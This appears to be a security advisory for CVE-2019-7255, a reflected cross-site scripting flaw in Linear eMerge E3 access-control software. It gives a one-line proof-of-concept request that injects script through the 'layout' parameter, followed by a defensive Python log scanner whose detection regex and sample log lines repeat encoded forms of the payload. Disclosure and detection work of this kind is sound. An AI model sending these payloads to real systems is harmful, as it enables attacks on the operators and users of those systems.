Linear eMerge E3 1.00-06 Cross Site Scripting

Linear eMerge E3 versions 1.00-06 and below suffer from a reflective cross site scripting vulnerability.


MD5 | 30e885414e737bb06b40d088ff11c336


Linear eMerge E3 Unauthenticated Reflected XSS
Affected version: <=1.00-06
CVE: CVE-2019-7255
Advisory: https://applied-risk.com/resources/ar-2019-005

Discovered by Gjoko 'LiquidWorm' Krstic

PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1
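
A defender-side check for the request pattern in the PoC, added here as an example and not part of the original advisory: it scans web access logs for requests to `/badging/badge_template_v0.php` whose `layout` parameter decodes to HTML markup. The log format (Apache common/combined), the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, unquote_plus, urlsplit

# Endpoint and parameter taken from the PoC request in the advisory.
TARGET_PATH = "/badging/badge_template_v0.php"
TARGET_PARAM = "layout"

# Assumption: the access log is in Apache common/combined format.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>.*?) HTTP/[\d.]+"')
# Markup a reflected value needs in order to break out into HTML or script.
MARKUP_RE = re.compile(r"[<>\"'`]|javascript:|\bon\w+\s*=", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (client_ip, decoded layout value) for requests carrying markup."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m.group("uri"))
        if unquote(parts.path) != TARGET_PATH:
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == TARGET_PARAM:
                decoded = fully_decode(value)
                if MARKUP_RE.search(decoded):
                    hits.append((m.group("ip"), decoded))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
# "default" is a made-up benign layout value.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Nov/2019:10:00:00 +0000] "GET /badging/badge_template_v0.php?layout=default HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Nov/2019:10:00:05 +0000] "GET /badging/badge_template_v0.php?layout=%3Cscript%3Econfirm(%27XSS%27)%3C/script%3E HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Nov/2019:10:00:09 +0000] "GET /badging/badge_template_v0.php?layout=%253Cscript%253Econfirm(1)%253C%252Fscript%253E HTTP/1.1" 200 640',
    '203.0.113.4 - - [01/Nov/2019:10:01:00 +0000] "GET /index.php?layout=%3Cb%3E HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} layout={value!r}")
```

Because the flaw is unauthenticated and reflected, hits from internal clients usually mean a user followed a crafted link, so the `Referer` field of matching entries is worth reviewing as well.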
